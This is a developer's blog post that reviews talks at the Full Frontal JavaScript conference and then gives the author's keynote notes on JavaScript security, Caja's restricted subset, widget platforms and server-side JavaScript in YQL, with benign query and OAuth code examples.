Last Friday I attended Full Frontal without speaking, which was a welcome change in my schedule. Originally I didn’t mean to go at all but some people dropping out meant that I had to go. Seeing that I love Brighton and have truckloads of respect for Remy and Julie I went down there and I can only say I would have kicked myself if I hadn’t.
Full frontal was a pretty amazing conference with inspiring talks, good info and a quick flow that meant the day was over before I realised it.
Here are my impressions of the talks in succession:
Jeremy Ashkenas kicked off with “CoffeeScript Design Decisions” – an introduction to coffeescript and how it is not Ruby although the syntax looks eerily similar. Mike Davies has a detailed write up on this one and I liked the way Jeremy showed the benefits of Coffeescript without being pushy about it. I can see CS being used and with good debugging tools like SourceMapping this can be quite a boost for developers to build JavaScript without having to juggle its “special cases”
Phil Hawksworth followed up with “Excessive Enhancement – Are we taking proper care of the Web?” – a call to arms to stop us from using new technology in an obstructing and excessive fashion. His whipping boy example was beetle.de which is HTML5/CSS3 and all the other goodies but also clocks in at 11MB of data in hundreds of HTTP requests. In essence Phil repeated a lot of the things that I have been banging on about – that HTML5 is currently mostly used in brochureware sites that can put “skip intro” Flash solutions to shame in their lack of accessibility and responsiveness. Ubelly have a nice write-up of Phil’s talk and you can check the slides here. All in all I was very impressed with the talk. The presentation was very funny, at times it got a bit ranty, but that shows passion. I was very reminded of talks by Jake Archibald and seeing they worked together, that might not be coincidence. Phil also mentioned a lot of tricks how to fix the issues he complained about, which is exactly the right way to deal with this.
Marijn Haverbeke of Eloquent JavaScript fame gave a good round-up of text editors in the browser with “Respectable code-editing in the browser”. The main focus was on Code Mirror and Marijn brought the message across that in-browser editing is not an easy feat but something that needs to be done.
Talking about development in the browser and the cloud: Rik Arends of Cloud 9 was next with “How we Architected Cloud9 IDE for scale on NodeJS” and basically blew me away showing off the new features that make Cloud9 a really interesting choice for collaborative editing in the browser.
After Lunch, Nicholas Zakas did a re-run of his “Scalable JavaScript Application Architecture” talk given some two years ago at another conference. That said, a lot of the talk still rings very much true and Nicolas changed a lot of it to be agnostic of the environment and libraries in use. If you are looking for information to get you on the way to build huge JavaScript solutions, this is a good piece of advice.
Local linked data and open format overlord Glenn Jones was next with “Beyond the page” – a good talk on how new features in HTML5 like drag and drop, File API and post messages allow us to build incredibly rich and web-enabled applications. Glenn showed off all the things that also get me very excited these days about the web, including web intents. A great and inspiring talk with lots of code and ideas to play with now. You could see Glenn’s passion for the topic – especially when he showed how to allow users do drag and drop an image from a browser to the desktop using JavaScript (forgetting that this is possible in browsers without any interfering on our part). The difference though is that you can convert the image while you drag it and automatically rename or pack it, too.
A very charming speaker, Brendan Dawes was next with “Beyond The Planet Of The Geeks” showing us just how much of a geek he is (collecting pencils and paper clips) and how his company and products moved from wild demos and experiments with interaction on a screen to useful and engaging products. To a degree what was shown does not quite meet that yet as the interface at the end was shiny and amazing and looked like Flash but used new technology. It failed to deliver the basic principles mentioned in Phil’s talk of bookmarkability and real links though. I talked with Brendan afterwards and we’ll work on getting the history API and local storage in there to make it beautiful, engaging and a good web citizen.
My absolute highlight of the day was Marcin Wichary with “You gotta do what you gotta do” – a talk about Google doodles and the work that went into them. Marcin was amazing – baffling interactive slides, a very humble demeanour and great information on the tricks that had to be applied to make doodles perform and be small. I was very much reminded on the things we had to do in the demo scene on C64 and Amiga. A great insight into just how much work goes into a thing that is seen for 24 hours and then vanishes. That said, I pestered Marcin afterwards if they are willing to show some of the cool stuff he explained in a blog and he said they would.
All in all it was an incredible day and well worth the money (had I paid for it). The only thing I am really sad about is that there was no recording or filming. Especially Marcin’s talk is something that needs to be archived for people to see.
Update : as Remy just pointed out on Twitter there are audio recordings of the talks available and will be published soon. They are also considering video recordings for the next year.
Here are the slides, the audio recording and my notes for the keynote of the full frontal conference held yesterday in Brighton, England. It was a blast, thank you Remy and Julie!
The following was the description of the talk introducing the ideas to the attendees of full frontal.
Frontloaded and zipped up – do loose types sink ships?
JavaScript had a bumpy ride up to now, from its origins as a CGI-replacement, initiator of countless popups and annoying effects over the renaissance as Ajax enabler up to becoming wrapped up in libraries to work around the hell that is browser differences. With the ubiquity of JavaScript comes a new challenge. How do we keep JavaScript safe when browsers don’t really distinguish between different sources and give them all the same rights? Why do we still judge the usefulness of JavaScript by how badly browsers speak it? Learn about some environments you can use JavaScript in securely and marvel at the magic and annoyances that are technologies that try to put a lock on the issue of JavaScript security.
A quick trip down memory lane.
When I first encountered JavaScript it was mainly used to do simple calculators, window manipulation and simple form validation. The main interface used was the browser object model with window being the main object and form and element being the collections to manipulate. You added content either by changing the value of a form field or by using document.write() with the latter being different from browser to browser. The other thing you had was the images array and this is what we used extensively to create rollovers.
Event handling was done with on{event} inline handlers and the body always had an onload handler on it.
Bring on the bling!
That however did not stop us from already abusing JavaScript to create pointless bells and whistles. Status bar tickers, title changing scripts and moving popup windows were the first to annoy the end user and they were just the start.
More bling.
With browsers starting to allow you to manipulate more of the document (via document.all and document.layers) and new and bespoke CSS extensions we had even more options to do very annoying and pointless things. Animated menus, rainbow cycling scrollbars, the floating (and flickering) Geocities logo, mousetrails and other abominations were built to bling up our sites and subsequently the audience got sick of JavaScript and discarded it as a toy.
Ajax for the win!
This all changed when Ajax came around and there was no way not to have some way or another you load content on demand using XMLhttpRequest – if you wanted to have a cool web site that is. And of course people used it wrongly.
Security scares.
As people used JavaScript to load information that should not be visible to the world and it is easy to intercept and see everything that happens in a browser in JavaScript we have more and more security scares coming up.
Is JavaScript a security problem?
This bears the question if JavaScript in itself is a security problem and if we should discard it at all.
Security flaws start at the backend but JavaScript gets the blame.
Last week I came across an interesting survey by the security company Cenzic – get the PDF here. They looked at the state of the web and the main security problems in the first two quarters of 2009. The survey showed that the browser was responsible for only 8% of the overall security issues.
One thing that is interesting is that most security flaws start with a problem on the backend but get blamed on JavaScript. XSS is a backend problem, but it becomes a problem as JavaScript is designed to give scripts too many rights.
JavaScript implementation vs. JavaScript
The problem is not JavaScript itself – well, not exclusively – it is mostly the implementation of it in browsers. And funnily enough this is how we measure the quality of the language. It is like judging the quality of a book by its movie.
Browsers don’t care where JavaScript comes from.
To a browser, every JavaScript has the same rights to the content of the page and other things JavaScript can reach – and that includes cookies. When I can steal your cookies I can steal your users’ identities and this is a big security issue.
Browsers are full of security holes.
The other issue is that browsers are full of security faults. This can be interesting as people complain about IE6 and its flaws, but the survey actually ranked Firefox and Safari as the most vulnerable browsers. The reasons are plugins in the case of Firefox and – in Safari’s case – the iPhone. Interesting targets are always successful platforms.
Plugins have and still are a main source for security issues. Especially in the case of IE Flash and PDF display was always a problem. The reason is simple – plugins extend the reach of the browser into the file system and that is an interesting attack vector. So if you offer PDF documents and you want to keep your system secure it might be a good idea to loop them through a script that sets a header that forces user download – this also allows you to add statistics to the PDF downloads.
So we can’t use JavaScript, right?
Which brings a lot of people not to trust JavaScript at all and see it as the source of all evil. Plugins like NoScript are all the rage and the security-conscious are happy to call JavaScript the source of all evil.
It is about spreading the joy of JavaScript.
JavaScript is an amazingly useful part of the interfaces we give our end users. Totally turning it off or not using it means we give up on a lot of things that our users should get and expect from an interface in 2009. I like that I can write a message while an attachment uploads in the background.
Learning JavaScript
The first thing to remember is that this is not 1997. We don’t have to learn JavaScript by looking at other people’s source code. Opera’s web standards curriculum and The Yahoo video theatre are great resources to take your first steps into the JavaScript world.
What to use JavaScript for
The main thing is to remember what we should use JavaScript for:
warning users about flawed entries (password strength for example)
extending the interface options of HTML to become an application language (sliders, maps, comboboxes…)
Any visual effect that cannot be done safely with CSS (animation, menus…)
CSS has come a long way but unless you can control the animation and be sure it works cross-browser it is not a replacement. Menu systems using CSS only are a gimmick as they cannot be made keyboard accessible.
What not to use JavaScript for
Sensitive information (credit card numbers, any real user data)
Cookie handling containing session data
Trying to protect content (right-click scripts, email obfuscation)
Replacing your server / saving on server traffic without a fallback
What if you need more?
All this becomes an issue when you get into developing large web products where you push the envelope of what can be done with the web and the technologies right now. The new Yahoo homepage is one of these examples – in it we wanted to allow third party developers to build own applications and run them safely inside ours without endangering the privacy of our users.
You can limit yourself
One thing you can do is to limit yourself to the “safe” parts of a language. Douglas Crockford’s AdSafe takes this approach and is meant as a guideline for ad providers.
You can pre-process JavaScript
The other option is to enforce the limitation of the language by pre-processing JavaScript and converting it to a safer subset. The main tool for this nowadays is Caja which has been invented by Google and now made workable by Google and Yahoo for the Open Social platform. Caja converts JavaScript to a safe subset – either on the client or on the server.
Things Caja doesn’t allow you to do
To ensure the security of our applications, Caja stops you from using some things you might have gotten accustomed to using in the last few years.
Caja and HTML
Here are the things you cannot use in HTML:
name attributes
custom attributes
custom tags
unclosed tags
embed
iframe
link rel=”...”
javascript:void(0)
radio buttons in IE
relative URLs
Caja and JavaScript
Things you need to keep out of your JavaScript:
eval()
new Function()
strings as event handlers (node.onclick = ‘...’;)
names ending with double / triple underscores
with function (with (obj) { ... })
implicit global variables (specify var variable)
calling a method as a function
document.write
window.event
ajax requests returning JS
Caja and CSS
And last but not least things deemed dangerous in CSS are:
star hacks
underscore hacks
IE conditionals
Insert-after clear fix
expression()
*@import
Caja ready code examples
You can find a good collection of Caja ready code examples in the Yahoo Application Platform documentation.
Caja problems and making it easier
Whilst Caja is a great idea to ensure the security of widgets it is not without its problems. If you chose client-side conversion it means a massive dent in the performance of your application and even with server-side conversion it becomes harder to build new systems. For starters, Caja-converted code is very hard to read and therefore debug and in many cases it means that as a developer you need to change your ways.
Libraries and Caja compliance
Much like we fix browsers, we can also use libraries to make our Caja-compliant development easier. The first library to be fully Caja compliant is the Yahoo User Interface library and other libraries like jQuery have also shown interest in compliance.
Abstracting the issue with an own language – YML
The other way to make it easier to write secure code is to abstract most of th changes to our normal development ways out into an own markup language. Facebook had done this and in Yahoo’s case there is the Yahoo Markup language or short YML. Using this language in a widget for the Yahoo homepage you can do Ajax requests and dig into the Yahoo social graph without having to write any JavaScript or server-side code.
Extending browsers
Another interesting way to make JavaScript development more interesting is to think about browser extensions. This starts with GreaseMonkey which allows Firefox users to extend any web site out there with new functionality using a few lines of Dom Scripting – a great way for example to do quick prototyping. Google Gears, Yahoo Browser Plus and and Mozilla Jetpack kick this idea up a notch and give you new APIs to extend the reach of the browser into local storage, allow for database access in JavaScript and give you worker threads to do heavy computations without slowing down the main interface. These extensions give browsers the power we would love to have to be able to deliver real applications inside browsers.
Moving out of the browser
The other thing you can do with JavaScript these days is to move outside the browser and take your HTML, CSS and JavaScript solutions to other platforms.
Widget frameworks
Widget frameworks have been around for a while with Konfabulator and Apple Dashboard widgets leading the way. Opera also allows you to run small applications outside the confines of a browser window. The interesting thing about widgets is that they always looked much prettier than most web solutions – mainly because PNG support was a given and not something you had to hack for MSIE.
W3C widgets
W3C widgets are a standard that allows you to zip up an HTML document with CSS, JavaScript and images and run it as a self-contained widget. Peter-Paul Koch has written a great introduction to W3C widgets and several mobile phone providers (first and foremost Vodafone) offer a way to run these widgets on handsets without the need to learn any mobile OS language or tools.
Adobe Air
Adobe Air has made it possible for web developers to write full-blown installable applications that run across several operating systems and have access to databases and the file system. Probably the most successful apps are Twitter clients and music apps like Spotify.
Command line JavaScript – Rhino
If you don’t like all the fancy visual stuff and you want to use JavaScript to do some heavy data conversion you can use JavaScript on the command line using Rhino which is a Java implementation of JavaScript. The really cool thing about writing JavaScript for the command line is that it supports all the features of the language and you are not at the mercy of a browser to do it right.
Turning JavaScript Mashups into web services.
One rather new opportunity for developers is that you can use YQL or Yahoo Query Language to easily mash-up and filter data from several data sources on the web. YQL allows you to:
mashup data with a SQL-style syntax
filter down to the absolutely necessary data
return as XML, JSON, JSON-P and JSON-P-X
use Yahoo as a high-speed proxy to retrieve data from various sources.
use Yahoo as a rate limiting and caching proxy when providing data.
Retrieving data from an HTML document and choosing the right output format
Using YQL it is dead easy for example to retrieve the headlines from an HTML document with the following statement.
select * from html where url=”http://2009.fullfrontal.org” and xpath=”//h3”
YQL is a web service in itself and you can retrieve the data returned from this request in different formats.
XML returns the data as an XML file which is not that useful in a JavaScript environment.
JSON is natively supported and therefore much easier to parse.
JSON-P wraps the returned JSON object in a JavaScript function call and thereby makes it very easy to use in a script node (either hardcoded or created on the fly).
JSON-P-X wraps the returned JSON object in a JavaScript function call and returns the XML content (in this case the scraped HTML) as a string. This makes it very easy to use innerHTML to render the data in a browser without having to loop through the JSON object and re-assemble the string.
Retrieving photos for a certain geographical location
As a demo, try this out. In order to retrieve photos for a certain geographical location you can use the geo and Flickr APIs in a single YQL statement:
select farm,id,secret,owner.realname,server,title,urls.url.content
from flickr.photos.info where photo_id in(
select id from flickr.photos.search where woe_id in(
select woeid from geo.places where text=”london”
)
Moving JavaScript solutions into YQL to turn them into web services
The problem with the solution above is that you make yourself dependent on JavaScript to show these photos. If you want to still use JavaScript but allow users without it to see these photos you can use a YQL open table with embedded JavaScript to do the conversion. YQL uses Rhino to run and execute your JavaScript server-side and returns you the content you created inside an XML or JSON file. As JavaScript is executed on the server, you have full E4X support to make the use of XML painless and you can use advanced JavaScript like for each:
var amt = amount || 10;
var query = ‘select farm,id,secret,owner.realname,server,title,’+
‘urls.url.content from flickr.photos.info where ‘+
‘photo_id in (select id from flickr.photos.search(‘+
amount + ‘) where ‘;
if(location!==null){
query += ‘woe_id in (select woeid from geo.places where text=”’ +
location+’”) and ‘;
}
query += ’ text=”’ + text + ‘” and license=4)’
var x = y.query(query);
var out =
;
for each(var cur in x.results.photo){
var li = ;
var a = ;
a.@[“href”] = cur.urls.url;
var img = ;
var url = ‘http://farm’ + cur.@farm + ‘.static.flickr.com/’ +
cur.@server + ‘/’+cur.@id + ‘_’ + cur.@secret +
‘_s.jpg’;
img.@[“src”] = url;
img.@[“alt”] = cur.title;
a.img = img;
li.a = a;
out.li += li;
}
response.object = out;
This, embedded in an open table means you can retrieve photos from Flickr as a UL now using the following YQL statement:
select * from flickr.photolist where text=”me” and location=”uk” and amount=20
Or with a very simple JavaScript, thanks to the JSON-P-X output format:
Another example – scraping HTML from web pages that need POST data
Another powerful example of what you can do with JavaScript when you embed it into a YQL table is the following:
Christian Heilmann HTML pages that need post data
select * from {table} where
url=’http://isithackday.com/hacks/htmlpost/index.php’
and postdata=”foo=foo&bar=bar” and xpath=”//p”]]> http://www.wait-till-i.com/2009/11/16/using-yql-to-read-html-from-a-document-that-requires-post-data/
As explained in detail in this blog post this JavaScript extends the HTML scraping option of YQL to allow for POST data to be sent to a document before retrieving the HTML:
select * from htmlpost where
url=’http://isithackday.com/hacks/htmlpost/index.php’
and postdata=”foo=foo&bar=bar” and xpath=”//p”
Notice that YQL execute gives you full REST and HTTP support and has the xpath conversion built-in as a on own function.
oAuth in JavaScript – the netflix example
Another interesting example is the open table provided by Netflix, which shows you how you can use oAuth in JavaScript:
// Include the OAuth libraries from oauth.net
y.include(“http://oauth.googlecode.com/svn/code/javascript/oauth.js”);
y.include(“http://oauth.googlecode.com/svn/code/javascript/sha1.js”);
// Collect all the parameters
var encodedurl = request.url;
var accessor = { consumerSecret: cks, tokenSecret: “”};
var message = { action: encodedurl, method: “GET”, parameters: [[“oauth_consumer_key”,ck],[“oauth_version”,”1.0”]]};
OAuth.setTimestampAndNonce(message);
// Sign the request
OAuth.SignatureMethod.sign(message, accessor);
try {
// get the content from service along with the OAuth header, and return the result back out
response.object = request.contentType(‘application/xml’).header(“Authorization”, OAuth.getAuthorizationHeader(“netflix.com”, message.parameters)).get().response;
} catch(err) {
response.object = {‘result’:’failure’, ‘error’: err};
}
Liberating our JavaScript
As you can see switching environments liberates our JavaScript solutions and gives us much tighter security. So open your minds and don’t judge JavaScript by its implementation. Instead have fun with it and use it wisely. With great power comes great responsibility.